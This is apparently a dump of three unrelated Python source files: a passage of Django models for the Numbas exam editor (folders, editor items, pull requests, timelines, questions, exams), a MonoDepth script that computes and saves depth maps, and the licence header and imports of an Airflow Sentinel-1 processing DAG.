profile_url = reverse('view_profile',args=(user.pk,))
if request:
profile_url = request.build_absolute_uri(profile_url)
return {
'name': user.get_full_name(),
'profile_url': profile_url,
}
else:
return {
'name': self.name,
'profile_url': self.profile_url,
}
class Meta:
unique_together = (("item","user"))
class Folder(models.Model):
name = models.CharField(max_length=200)
project = models.ForeignKey(Project, null=False, related_name='folders', on_delete=models.CASCADE)
parent = models.ForeignKey('Folder', null=True, related_name='folders', on_delete=models.CASCADE)
class Meta:
unique_together = (('name', 'project', 'parent'),)
ordering = ('name',)
def clean(self):
if self.parent==self:
raise ValidationError("A folder can't be its own parent.")
def __str__(self):
return '/'.join([self.project.name]+[f.name for f in self.parents()])
def parents(self):
bits = []
f = self
while f:
bits.insert(0,f)
f = f.parent
return bits
def path(self):
return '/'.join(urllib.parse.quote(f.name) for f in self.parents())
def get_absolute_url(self):
return reverse('project_browse',args=(self.project.pk, self.path()+'/'))
def as_json(self):
return {
'pk': self.pk,
'url': self.get_absolute_url(),
'name': self.name,
}
def merge_into(self,folder):
for item in self.items.all():
item.folder = folder
item.save()
for subfolder in Folder.objects.filter(parent=self):
subfolder.parent = folder
subfolder.save()
self.delete()
def all_contents(self):
queue = [self]
folders = []
items = []
while queue:
f = queue.pop()
folders.append(f)
items += f.items.all()
queue += f.folders.all()
return folders, items
@reversion.register
class EditorItem(models.Model, NumbasObject, ControlledObject):
"""
Base model for exams and questions: each exam or question has a reference to an instance of this.
"""
objects = EditorItemManager()
name = models.CharField(max_length=200)
slug = models.SlugField(max_length=200, editable=False, unique=False)
timeline = GenericRelation('TimelineItem', related_query_name='editoritems', content_type_field='timeline_content_type', object_id_field='timeline_id')
comments = GenericRelation('Comment', content_type_field='object_content_type', object_id_field='object_id')
author = models.ForeignKey(User, related_name='own_items', on_delete=models.CASCADE)
public_access = models.CharField(default='view', editable=True, choices=PUBLIC_ACCESS_CHOICES, max_length=6)
access_rights = models.ManyToManyField(User, through='Access', blank=True, editable=False, related_name='accessed_items')
licence = models.ForeignKey(Licence, null=True, blank=True, on_delete=models.SET_NULL)
project = models.ForeignKey(Project, null=True, related_name='items', on_delete=models.CASCADE)
folder = models.ForeignKey(Folder, null=True, related_name='items', on_delete=models.SET_NULL)
content = models.TextField(blank=True, validators=[validate_content])
metadata = JSONField(blank=True)
created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
copy_of = models.ForeignKey('self', null=True, related_name='copies', on_delete=models.SET_NULL)
tags = TaggableManager(through=TaggedItem)
current_stamp = models.ForeignKey('NewStampOfApproval', blank=True, null=True, on_delete=models.SET_NULL)
share_uuid_view = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)
share_uuid_edit = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)
published = models.BooleanField(default=False)
published_date = models.DateTimeField(null=True)
ability_level_start = AbilityLevelField(null=True)
ability_level_end = AbilityLevelField(null=True)
ability_levels = models.ManyToManyField(AbilityLevel)
subjects = models.ManyToManyField(Subject)
topics = models.ManyToManyField(Topic)
taxonomy_nodes = models.ManyToManyField(TaxonomyNode, related_name='editoritems')
unwatching_users = models.ManyToManyField(User, related_name='unwatched_items')
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
def __unicode__(self):
return self.name
@property
def watching_users(self):
q = (User.objects.filter(pk=self.author.pk) | User.objects.filter(item_accesses__item=self)).distinct() | self.project.watching_users
return q.exclude(pk__in=self.unwatching_users.all())
@property
def owner(self):
return self.author
def get_current_stamp(self):
if self.current_stamp is not None:
return self.current_stamp
else:
return NewStampOfApproval(object=self,status='draft')
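# Note: when no stamp has been given yet, this returns an unsaved placeholder
# NewStampOfApproval with status 'draft' rather than None.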
def has_access(self, user, levels):
if user.is_anonymous:
return False
return self.project.has_access(user, levels) or Access.objects.filter(item=self, user=user, access__in=levels).exists()
def can_be_viewed_by(self, user):
if self.item_type=='exam' and getattr(settings,'EXAM_ACCESS_REQUIRES_QUESTION_ACCESS',False):
for q in self.exam.questions.all():
if not q.editoritem.can_be_viewed_by(user):
return False
return super().can_be_viewed_by(user)
def publish(self):
self.published = True
self.published_date = timezone.now()
def unpublish(self):
self.published = False
def set_licence(self, licence):
NumbasObject.get_parsed_content(self)
metadata = self.parsed_content.data.setdefault(u'metadata', {})
metadata['licence'] = licence.name if licence is not None else None
self.licence = licence
self.content = str(self.parsed_content)
def copy(self, author=None):
e2 = deepcopy(self)
e2.id = None
e2.share_uuid_view = uuid.uuid4()
e2.share_uuid_edit = uuid.uuid4()
e2.current_stamp = None
e2.public_access = 'view'
e2.published = False
e2.published_date = None
e2.copy_of = self
e2.folder = None
if author is not None:
e2.author = author
return e2
def get_absolute_url(self):
return self.rel_obj.get_absolute_url()
@property
def item_type(self):
if hasattr(self, 'exam'):
return 'exam'
elif hasattr(self, 'question'):
return 'question'
@property
def rel_obj(self):
""" the exam/question object corresponding to this item (to make contructing the URLs easier, mainly) """
if hasattr(self, 'exam'):
return self.exam
elif hasattr(self, 'question'):
return self.question
def as_numbasobject(self,request):
obj = self.exam if self.item_type=='exam' else self.question
numbasobj = obj.as_numbasobject(request)
return numbasobj
@property
def icon(self):
return self.rel_obj.icon
@property
def theme_path(self):
return self.rel_obj.theme_path
def edit_dict(self):
"""
Dictionary of information passed to edit view
"""
self.get_parsed_content()
return {
'id': self.rel_obj.id,
'editoritem_id': self.id,
'project_id': self.project.id,
'author': self.author_id,
'metadata': self.metadata,
'published': self.published,
'JSONContent': self.parsed_content.data,
'tags': [t.name for t in self.tags.all()],
'taxonomy_nodes': [n.pk for n in self.taxonomy_nodes.all()],
'ability_levels': [a.pk for a in self.ability_levels.all()],
}
@property
def filename(self):
return '{}-{}-{}'.format(self.item_type, self.pk, self.slug)
@property
def network(self):
ei = self
while ei.copy_of:
ei = ei.copy_of
return sorted(ei.descendants(), key=lambda x: x.created)
def descendants(self):
return [self]+sum([ei2.descendants() for ei2 in self.copies.all()], [])
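# Note: network walks copy_of links up to the original item, then returns every
# copy descended from that root (including the root itself), ordered by
# creation date.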
def summary(self, user=None):
current_stamp = self.get_current_stamp()
obj = {
'editoritem_id': self.id,
'name': self.name,
'published': self.published,
'metadata': self.metadata,
'created': str(self.created),
'last_modified': str(self.last_modified),
'author': self.author.get_full_name(),
'current_stamp': current_stamp.status,
'current_stamp_display': current_stamp.get_status_display()
}
if self.item_type == 'exam':
obj['id'] = self.exam.id
elif self.item_type == 'question':
obj['id'] = self.question.id
if user:
obj['canEdit'] = self.can_be_edited_by(user)
return obj
def merge(self, other):
oname = self.name
self.content = other.content
self.metadata = other.metadata
self.tags.set(*other.tags.all())
self.ability_levels.clear()
self.ability_levels.add(*other.ability_levels.all())
self.set_name(oname)
self.rel_obj.merge(other.rel_obj)
self.save()
@receiver(signals.post_save, sender=EditorItem)
def author_contributes_to_editoritem(instance, created, **kwargs):
if created:
Contributor.objects.get_or_create(item=instance,user=instance.author)
@receiver(signals.pre_save, sender=EditorItem)
def set_editoritem_name(instance, **kwargs):
NumbasObject.get_parsed_content(instance)
instance.slug = slugify(instance.name)
if 'metadata' in instance.parsed_content.data:
licence_name = instance.parsed_content.data['metadata'].get('licence', None)
else:
licence_name = None
instance.licence = Licence.objects.filter(name=licence_name).first()
@receiver(signals.pre_save, sender=EditorItem)
def set_ability_level_limits(instance, **kwargs):
if instance.pk is None:
return
ends = instance.ability_levels.aggregate(Min('start'), Max('end'))
instance.ability_level_start = ends.get('start__min', None)
instance.ability_level_end = ends.get('end__max', None)
class PullRequestManager(models.Manager):
def open(self):
return self.filter(open=True)
class PullRequest(models.Model, ControlledObject, TimelineMixin):
objects = PullRequestManager()
# user who created this request
owner = models.ForeignKey(User, related_name='pullrequests_created', on_delete=models.CASCADE)
# user who accepted or rejected this request
closed_by = models.ForeignKey(User, related_name='pullrequests_closed', null=True, blank=True, on_delete=models.SET_NULL)
source = models.ForeignKey(EditorItem, related_name='outgoing_pull_requests', on_delete=models.CASCADE)
destination = models.ForeignKey(EditorItem, related_name='incoming_pull_requests', on_delete=models.CASCADE)
open = models.BooleanField(default=True)
accepted = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
comment = models.TextField(blank=True)
timelineitems = GenericRelation('TimelineItem', related_query_name='pull_requests', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/pull_request.html'
@property
def object(self):
return self.destination
def timeline_user(self):
if self.open:
return self.owner
else:
return self.closed_by
def has_access(self, user, accept_levels):
return self.destination.has_access(user, accept_levels) or user == self.owner
def can_be_merged_by(self, user):
return self.destination.can_be_edited_by(user)
def can_be_deleted_by(self, user):
return user == self.owner or self.destination.can_be_edited_by(user)
def can_be_viewed_by(self, user):
return self.source.can_be_viewed_by(user) and self.destination.can_be_viewed_by(user)
def clean(self):
if self.source == self.destination:
raise ValidationError({'source': "Source and destination are the same."})
def validate_unique(self, exclude=None):
if self.open and PullRequest.objects.filter(source=self.source, destination=self.destination, open=True).exists():
raise ValidationError("There's already an open pull request between these items.")
def accept(self, user):
self.accepted = True
self.destination.merge(self.source)
self.close(user)
self.save()
def reject(self, user):
self.accepted = False
self.close(user)
self.save()
def close(self, user):
self.open = False
self.closed_by = user
class Timeline(object):
def __init__(self, items, viewing_user):
self.viewing_user = viewing_user
items = items.prefetch_related('object')
nonsticky_broadcasts = SiteBroadcast.objects.visible_now().exclude(sticky=True)
view_filter = Q(editoritems__published=True) | Q(object_content_type=ContentType.objects.get_for_model(SiteBroadcast), object_id__in=nonsticky_broadcasts)
if not self.viewing_user.is_anonymous:
projects = self.viewing_user.own_projects.all() | Project.objects.filter(projectaccess__in=self.viewing_user.project_memberships.all()) | Project.objects.filter(watching_non_members=self.viewing_user)
items_for_user = (
Q(editoritems__accesses__in=self.viewing_user.item_accesses.all()) |
Q(editoritems__project__in=projects) |
Q(projects__in=projects) |
Q(extension_accesses__user=viewing_user) |
Q(theme_accesses__user=viewing_user)
)
view_filter = view_filter | items_for_user
filtered_items = items.filter(view_filter)
if not self.viewing_user.is_anonymous:
filtered_items = filtered_items.exclude(hidden_by=self.viewing_user)
self.filtered_items = filtered_items
def __getitem__(self, index):
return self.filtered_items.__getitem__(index)
class TimelineItemManager(models.Manager):
def visible_to(self, user):
objects = self.exclude(hidden_by=user)
return objects
class TimelineItem(models.Model):
objects = TimelineItemManager()
# Object whose timeline this item belongs to
timeline_content_type = models.ForeignKey(ContentType, related_name='timelineitem_timeline', null=True, on_delete=models.CASCADE)
timeline_id = models.PositiveIntegerField(null=True)
timeline = GenericForeignKey('timeline_content_type', 'timeline_id')
# Reference to an object representing this item (e.g. a Comment)
object_content_type = models.ForeignKey(ContentType, related_name='timelineitem_object', on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
object = GenericForeignKey('object_content_type', 'object_id')
user = models.ForeignKey(User, related_name='timelineitems', null=True, on_delete=models.CASCADE)
hidden_by = models.ManyToManyField(User, related_name='hidden_timelineitems', blank=True)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{}: {}'.format(self.date, str(self.object))
def can_be_deleted_by(self, user):
try:
return self.object.can_be_deleted_by(user)
except AttributeError:
return False
def can_be_viewed_by(self, user):
return self.user == user or self.object.can_be_viewed_by(user)
class Meta:
unique_together = (('object_id', 'object_content_type'),)
ordering = ('-date',)
@receiver(signals.post_delete, sender=TimelineItem)
def delete_timelineitem_object(instance, *args, **kwargs):
if instance.object is not None:
instance.object.delete()
class SiteBroadcastManager(models.Manager):
def visible_now(self):
return self.filter(Q(show_until__gte=timezone.now()) | Q(show_until=None))
class SiteBroadcast(models.Model, TimelineMixin):
objects = SiteBroadcastManager()
author = models.ForeignKey(User, related_name='site_broadcasts', on_delete=models.CASCADE)
title = models.CharField(max_length=200)
text = models.TextField()
sticky = models.BooleanField(default=False)
show_until = models.DateTimeField(null=True, blank=True)
timelineitems = GenericRelation(TimelineItem, related_query_name='site_broadcasts', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/site_broadcast.html'
def can_be_deleted_by(self, user):
return False
def can_be_viewed_by(self, user):
return True
def timeline_object(self):
return None
def __str__(self):
return self.text[:50]
class Tip(models.Model):
title = models.CharField(max_length=500)
text = models.TextField()
link = models.URLField(blank=True, null=True, verbose_name='Link to more information')
link_text = models.CharField(blank=True, null=True, max_length=200)
editoritem = models.ForeignKey(EditorItem, related_name='used_in_tips', blank=True, null=True, on_delete=models.SET_NULL, verbose_name='A question or exam demonstrating the tip')
def __str__(self):
return self.title
def __repr__(self):
return 'Tip "{}"'.format(self.title)
class NewStampOfApproval(models.Model, TimelineMixin):
object = models.ForeignKey(EditorItem, related_name='stamps', on_delete=models.CASCADE)
timelineitems = GenericRelation(TimelineItem, related_query_name='stamps', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/stamp.html'
user = models.ForeignKey(User, related_name='newstamps', on_delete=models.CASCADE)
status = models.CharField(choices=STAMP_STATUS_CHOICES, max_length=20)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{} said "{}"'.format(self.user.username, self.get_status_display())
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
class Meta:
ordering = ('-date',)
class Comment(models.Model, TimelineMixin):
object_content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
object = GenericForeignKey('object_content_type', 'object_id')
timelineitems = GenericRelation(TimelineItem, related_query_name='comments', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/comment.html'
user = models.ForeignKey(User, related_name='comments', on_delete=models.CASCADE)
text = models.TextField()
def __str__(self):
return 'Comment by {} on {}: "{}"'.format(self.user.get_full_name(), str(self.object), self.text[:47]+'...' if len(self.text) > 50 else self.text)
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
class RestorePoint(models.Model, TimelineMixin):
object = models.ForeignKey(EditorItem, related_name='restore_points', on_delete=models.CASCADE)
timelineitems = GenericRelation(TimelineItem, related_query_name='restore_points', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/restore_point.html'
user = models.ForeignKey(User, related_name='restore_points', on_delete=models.CASCADE)
description = models.TextField()
revision = models.ForeignKey(reversion.models.Revision, on_delete=models.CASCADE)
def __str__(self):
return 'Restore point set by {} on {}: "{}"'.format(self.user.get_full_name(), str(self.object), self.description[:47]+'...' if len(self.description) > 50 else self.description)
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
ITEM_CHANGED_VERBS = [('created', 'created')]
class ItemChangedTimelineItem(models.Model, TimelineMixin):
object = models.ForeignKey(EditorItem, on_delete=models.CASCADE)
verb = models.CharField(choices=ITEM_CHANGED_VERBS, editable=False, max_length=10)
user = models.ForeignKey(User, on_delete=models.CASCADE)
timelineitems = GenericRelation(TimelineItem, related_query_name='item_changes', content_type_field='object_content_type', object_id_field='object_id')
timelineitem_template = 'timeline/change.html'
def can_be_viewed_by(self, user):
return self.object.can_be_viewed_by(user)
def can_be_deleted_by(self, user):
return False
def icon(self):
return {
'created': 'plus',
'deleted': 'remove',
'published': 'globe',
}[self.verb]
def __str__(self):
return '{} {} {}'.format(self.user.get_full_name(), self.verb, str(self.object))
@receiver(signals.post_save)
def create_timelineitem(sender, instance, created, **kwargs):
if not issubclass(sender, TimelineMixin):
return
if created:
try:
user = User.objects.get(pk=instance.user.pk)
except AttributeError:
user = None
TimelineItem.objects.create(object=instance, timeline=instance.timeline_object(), user=user)
@reversion.register
class NewQuestion(models.Model):
editoritem = models.OneToOneField(EditorItem, on_delete=models.CASCADE, related_name='question')
resources = models.ManyToManyField(Resource, blank=True)
extensions = models.ManyToManyField(Extension, blank=True)
custom_part_types = models.ManyToManyField(CustomPartType, blank=True, related_name='questions')
theme_path = os.path.join(settings.GLOBAL_SETTINGS['NUMBAS_PATH'], 'themes', 'question')
icon = 'file'
class Meta:
verbose_name = 'question'
ordering = ['editoritem__name']
permissions = (
('highlight', 'Can pick questions to feature on the front page.'),
)
def __str__(self):
return self.editoritem.name
def __unicode__(self):
return self.editoritem.name
def get_absolute_url(self):
return reverse('question_edit', args=(self.pk, self.editoritem.slug))
@property
def resource_paths(self):
return [(r.file.name, r.file.path) for r in self.resources.all()]
def as_numbasobject(self,request):
self.editoritem.get_parsed_content()
contributor_data = [c.as_json(request) for c in self.editoritem.contributors.all()]
question_data = self.editoritem.parsed_content.data
question_data['contributors'] = contributor_data
data = OrderedDict([
('name', self.editoritem.name),
('extensions', [e.location for e in self.extensions.all()]),
('custom_part_types', [p.as_json() for p in self.custom_part_types.all()]),
('resources', self.resource_paths),
('navigation', {'allowregen': True, 'showfrontpage': False, 'preventleave': False}),
('question_groups', [{'pickingStrategy':'all-ordered', 'questions':[question_data]}]),
])
data['contributors'] = contributor_data
obj = numbasobject.NumbasObject(data=data, version=self.editoritem.parsed_content.version)
return obj
def edit_dict(self):
d = self.editoritem.edit_dict()
d['extensions'] = [e.location for e in self.extensions.all()]
d['resources'] = [res.as_json() for res in self.resources.all()]
return d
def summary(self, user=None):
obj = self.editoritem.summary(user)
obj['url'] = reverse('question_edit', args=(self.pk, self.editoritem.slug,))
obj['deleteURL'] = reverse('question_delete', args=(self.pk, self.editoritem.slug))
return obj
@property
def exams_using_this(self):
return self.exams.distinct()
def copy(self, author=None):
q2 = deepcopy(self)
q2.id = None
ei2 = self.editoritem.copy(author)
ei2.save()
q2.editoritem = ei2
q2.save()
q2.resources.set(self.resources.all())
q2.extensions.set(self.extensions.all())
q2.save()
return q2
def merge(self, other):
self.resources.clear()
self.resources.add(*other.resources.all())
self.extensions.clear()
self.extensions.add(*other.extensions.all())
self.save()
@receiver(signals.post_save, sender=NewQuestion)
def set_question_custom_part_types(instance, **kwargs):
q = instance
c = NumbasObject.get_parsed_content(q.editoritem)
parts = c.data.get('parts',[])
all_parts = parts[:]
for p in parts:
all_parts += [s for s in p.get('steps',[])] + [g for g in p.get('gaps',[])]
part_types = set(p['type'] for p in all_parts)
q.custom_part_types.clear()
custom_part_types = CustomPartType.objects.filter(short_name__in=part_types)
q.custom_part_types.add(*custom_part_types)
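# Note: this keeps the question's custom_part_types relation in sync with the
# part types actually used in its content, including parts nested as steps or
# gaps inside other parts.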
@reversion.register
class NewExam(models.Model):
editoritem = models.OneToOneField(EditorItem, on_delete=models.CASCADE, related_name='exam')
questions = models.ManyToManyField(NewQuestion, through='NewExamQuestion', blank=True, editable=False, related_name='exams')
theme = models.CharField(max_length=200, default='default', blank=True) # used if custom_theme is None
custom_theme = models.ForeignKey(Theme, null=True, blank=True, on_delete=models.SET_NULL, related_name='used_in_newexams')
locale = models.CharField(max_length=200, default='en-GB')
icon = 'book'
class Meta:
verbose_name = 'exam'
def __str__(self):
return self.editoritem.name
def __unicode__(self):
return self.editoritem.name
def get_absolute_url(self):
return reverse('exam_edit', args=(self.pk, self.editoritem.slug))
@property
def resources(self):
return Resource.objects.filter(newquestion__in=self.questions.all()).distinct()
@property
def resource_paths(self):
return [(r.file.name, r.file.path) for r in self.resources.all()]
@property
def theme_path(self):
if self.custom_theme:
return self.custom_theme.extracted_path
else:
return os.path.join(settings.GLOBAL_SETTINGS['NUMBAS_PATH'], 'themes', self.theme)
def as_numbasobject(self,request):
obj = numbasobject.NumbasObject(self.editoritem.content)
data = obj.data
question_groups = self.question_groups
data['contributors'] = [c.as_json(request) for c in self.editoritem.contributors.all()]
data['extensions'] = [e.location for e in self.extensions]
data['custom_part_types'] = [p.as_json() for p in self.custom_part_types]
data['name'] = self.editoritem.name
if 'question_groups' not in data:
data['question_groups'] = self.question_groups_dict()
        def question_object(q):
            qdata = q.editoritem.as_numbasobject(request).data
            del qdata['question_groups']
            qdata.update(q.editoritem.parsed_content.data)
            return qdata
        for i, g in enumerate(data['question_groups']):
            questions = question_groups[i] if i < len(question_groups) else []
            g['questions'] = [question_object(q) for q in questions]
data['resources'] = self.resource_paths
return obj
def edit_dict(self):
"""
Dictionary of information passed to update view
"""
exam_dict = self.editoritem.edit_dict()
exam_dict['locale'] = self.locale
exam_dict['custom_theme'] = self.custom_theme_id
exam_dict['theme'] = self.theme
exam_dict['question_groups'] = self.question_groups_dict()
return exam_dict
def question_groups_dict(self):
        # itertools.groupby only groups consecutive items, so the queryset must be ordered by the grouping key first
        groups = groupby(self.newexamquestion_set.order_by('group', 'qn_order'), key=lambda q: q.group)
return [{'group':group, 'questions':[q.question.summary() for q in qs]} for group, qs in groups]
@property
def question_groups(self):
groups = []
for eq in self.newexamquestion_set.all():
while len(groups) < eq.group+1:
groups.append([])
groups[eq.group].append(eq.question)
return groups
@property
def extensions(self):
return Extension.objects.filter(newquestion__in=self.questions.all()).distinct()
@property
def custom_part_types(self):
return CustomPartType.objects.filter(questions__in=self.questions.all()).distinct()
def set_question_groups(self, question_groups):
with transaction.atomic():
self.questions.clear()
for group_number, group in enumerate(question_groups):
for order, pk in enumerate(group):
exam_question = NewExamQuestion(exam=self, question=NewQuestion.objects.get(pk=pk), qn_order=order, group=group_number)
exam_question.save()
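    # Illustrative call (primary keys are made up):
    #     exam.set_question_groups([[3, 5], [8]])
    # puts questions 3 and 5, in that order, into group 0 and question 8 into
    # group 1, which is the grouping that question_groups and
    # question_groups_dict read back.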
def copy(self, author=None):
e2 = deepcopy(self)
e2.id = None
ei2 = self.editoritem.copy(author)
ei2.save()
e2.editoritem = ei2
e2.save()
for eq in NewExamQuestion.objects.filter(exam=self):
NewExamQuestion.objects.create(exam=e2, question=eq.question, qn_order=eq.qn_order, group=eq.group)
e2.custom_theme = self.custom_theme
e2.save()
return e2
def merge(self, other):
with transaction.atomic():
for eq in other.newexamquestion_set.all():
exam_question = NewExamQuestion(exam=self, question=eq.question, qn_order=eq.qn_order, group=eq.group)
exam_question.save()
self.theme = other.theme
self.custom_theme = other.custom_theme
self.locale = other.locale
self.save()
class NewExamQuestion(models.Model):
"""
Through model for a question belonging to an exam.
    Specifies the position at which the question should appear.
"""
class Meta:
ordering = ['qn_order']
exam = models.ForeignKey(NewExam, on_delete=models.CASCADE)
question = models.ForeignKey(NewQuestion, on_delete=models.CASCADE)
qn_order = models.PositiveIntegerField()
group = models.PositiveIntegerField(default=0)
@receiver(signals.post_save, sender=NewQuestion)
@receiver(signals.post_save, sender=NewExam)
def item_created_timeline_event(instance, created, **kwargs):
if created:
ItemChangedTimelineItem.objects.create(user=instance.editoritem.author, object=instance.editoritem, verb='created')
@receiver(signals.post_save, sender=NewStampOfApproval)
@receiver(signals.post_delete, sender=NewStampOfApproval)
def set_current_stamp(instance, **kwargs):
instance.object.current_stamp = NewStampOfApproval.objects.filter(object=instance.object).order_by('-date').first()
instance.object.save()
@receiver(signals.post_save, sender=NewStampOfApproval)
def notify_stamp(instance, **kwargs):
notify_watching(instance.user, target=instance.object, verb='gave feedback on', action_object=instance)
@receiver(signals.post_save, sender=Comment)
def notify_comment(instance, **kwargs):
notify_watching(instance.user, target=instance.object, verb='commented on', action_object=instance)
@receiver(signals.post_delete, sender=EditorItem)
def delete_notifications_for_item(instance, **kwargs):
Notification.objects.filter(target_object_id=instance.pk, target_content_type=ContentType.objects.get_for_model(EditorItem)).delete()
|
py | 1a37bf556a214b3dcbf6dd6b374f75df9de59d37 | """Compute depth maps for images in the input folder.
"""
import os
import glob
import torch
# from monodepth_net import MonoDepthNet
# import utils
import matplotlib.pyplot as plt
import numpy as np
import cv2
import imageio
from PIL import Image
def run_depth(img_names, input_path, output_path, model_path, Net, utils, target_w=None):
"""Run MonoDepthNN to compute depth maps.
    Args:
        img_names (list): paths of the input images
        input_path (str): path to input folder (unused here; images come from img_names)
        output_path (str): path to output folder
        model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cpu")
print("device: %s" % device)
# load network
model = Net(model_path)
model.to(device)
model.eval()
# get input
# img_names = glob.glob(os.path.join(input_path, "*"))
num_images = len(img_names)
# create output folder
os.makedirs(output_path, exist_ok=True)
print("start processing")
for ind, img_name in enumerate(img_names):
print(" processing {} ({}/{})".format(img_name, ind + 1, num_images))
# input
img = utils.read_image(img_name)
scale = 640. / max(img.shape[0], img.shape[1])
target_height, target_width = int(round(img.shape[0] * scale)), int(round(img.shape[1] * scale))
img_input = utils.resize_image(img)
print(img_input.shape)
img_input = img_input.to(device)
# compute
with torch.no_grad():
out = model.forward(img_input)
depth = utils.resize_depth(out, target_width, target_height)
img = cv2.resize((img * 255).astype(np.uint8), (target_width, target_height), interpolation=cv2.INTER_AREA)
filename = os.path.join(
output_path, os.path.splitext(os.path.basename(img_name))[0]
)
np.save(filename + '.npy', depth)
# utils.write_depth(filename, depth, img, bits=2)
print("finished")
def run_depthv(img_npy, model_path,w,h, Net, utils, target_w=None):
"""Run MonoDepthNN to compute depth maps.
    Args:
        img_npy (np.ndarray): input BGR frame
        model_path (str): path to saved model
        w, h (int): output width and height
"""
print("initialize")
# select device
device = torch.device("cuda")
print("device: %s" % device)
# load network
model = Net(model_path)
model.to(device)
model.eval()
# get input
# img_names = glob.glob(os.path.join(input_path, "*"))
#num_images = len(img_names)
# create output folder
# os.makedirs(output_path, exist_ok=True)
print("start processing")
# input
    if img_npy.ndim == 2:
        # promote greyscale frames to 3 channels so the conversion and hstack below work
        img_npy = cv2.cvtColor(img_npy, cv2.COLOR_GRAY2BGR)
    img = cv2.cvtColor(img_npy, cv2.COLOR_BGR2RGB) / 255.0
    # the caller-supplied (w, h) is used for the output size below
img_input = utils.resize_image(img)
print(img_input.shape)
img_input = img_input.to(device)
# compute
with torch.no_grad():
out = model.forward(img_input)
depth = 50 + utils.resize_depth(out, w, h)*130
img = cv2.resize((img * 255).astype(np.uint8), (w, h), interpolation=cv2.INTER_AREA)
depth = np.clip(depth,0,254)
# img = cv2.resize((img * 255).astype(np.uint8), (target_width, target_height), interpolation=cv2.INTER_AREA)
# write_pfm(path + ".pfm", depth.astype(np.float32))
disp_to_img =np.array(Image.fromarray(depth).resize([w, h]))
# plt.imsave("test_disp.jpg", disp_to_img, cmap='gray')
# plt.imsave("test2_disp.jpg", img, cmap='gray')
disp_to_img = cv2.cvtColor(disp_to_img, cv2.COLOR_GRAY2RGB )
sbsframe= np.hstack((img_npy,disp_to_img))
return sbsframe
def run_depthf(in_path,out_path, model_path,w,h, Net, utils, target_w=None):
"""Run MonoDepthNN to compute depth maps.
    Args:
        in_path (str): path to the input image
        out_path (str): path of the output side-by-side image
        model_path (str): path to saved model
        w, h (int): output width and height
"""
print("initialize")
# select device
device = torch.device("cpu")
print("device: %s" % device)
# load network
model = Net(model_path)
model.to(device)
model.eval()
# get input
# img_names = glob.glob(os.path.join(input_path, "*"))
#num_images = len(img_names)
# create output folder
# os.makedirs(output_path, exist_ok=True)
print("start processing")
# input
img = utils.read_image(in_path)
    # the caller-supplied (w, h) is used for the output size below
img_input = utils.resize_image(img)
print(img_input.shape)
img_input = img_input.to(device)
# compute
with torch.no_grad():
out = model.forward(img_input)
depth = 50 + utils.resize_depth(out, w, h)*130
img = cv2.resize((img * 255).astype(np.uint8), (w, h), interpolation=cv2.INTER_AREA)
depth = np.clip(depth,0,254)
# img = cv2.resize((img * 255).astype(np.uint8), (w, h), interpolation=cv2.INTER_AREA)
# write_pfm(path + ".pfm", depth.astype(np.float32))
disp_to_img =np.array(Image.fromarray(depth).resize([w, h]))
# plt.imsave("test_disp.jpg", disp_to_img, cmap='gray')
# plt.imsave("test2_disp.jpg", img, cmap='gray')
disp_to_img = cv2.cvtColor(disp_to_img, cv2.COLOR_GRAY2RGB )
sbsframe= np.hstack((img,disp_to_img))
sbsframe= sbsframe.astype(np.uint8)
print(out_path)
k=Image.fromarray(sbsframe)
k.save(out_path)
#utils.write_depth(out_path, depth, img, bits=2)
print("finished")
# if __name__ == "__main__":
# # set paths
# INPUT_PATH = "image"
# OUTPUT_PATH = "output"
# MODEL_PATH = "model.pt"
# # set torch options
# torch.backends.cudnn.enabled = True
# torch.backends.cudnn.benchmark = True
# # compute depth maps
#     img_names = glob.glob(os.path.join(INPUT_PATH, "*"))
#     run_depth(img_names, INPUT_PATH, OUTPUT_PATH, MODEL_PATH, MonoDepthNet, utils, target_w=640)
|
py | 1a37bfae9bd13611e15a98b21e3b6c87ccdce595 | """
/*********************************************************************************/
* The MIT License (MIT) *
* *
* Copyright (c) 2014 EOX IT Services GmbH *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in *
* all copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
* *
*********************************************************************************/
"""
import os
import logging
import pprint
from datetime import datetime, timedelta
from airflow import DAG
from airflow.models import XCOM_RETURN_KEY
from airflow.operators import PythonOperator
from airflow.operators import RSYNCOperator
from airflow.operators import DHUSSearchOperator
from airflow.operators import DHUSDownloadOperator
from airflow.operators import ZipInspector
from airflow.operators import S1MetadataOperator
from airflow.operators import GDALWarpOperator
from airflow.operators import GDALAddoOperator
from airflow.utils.trigger_rule import TriggerRule
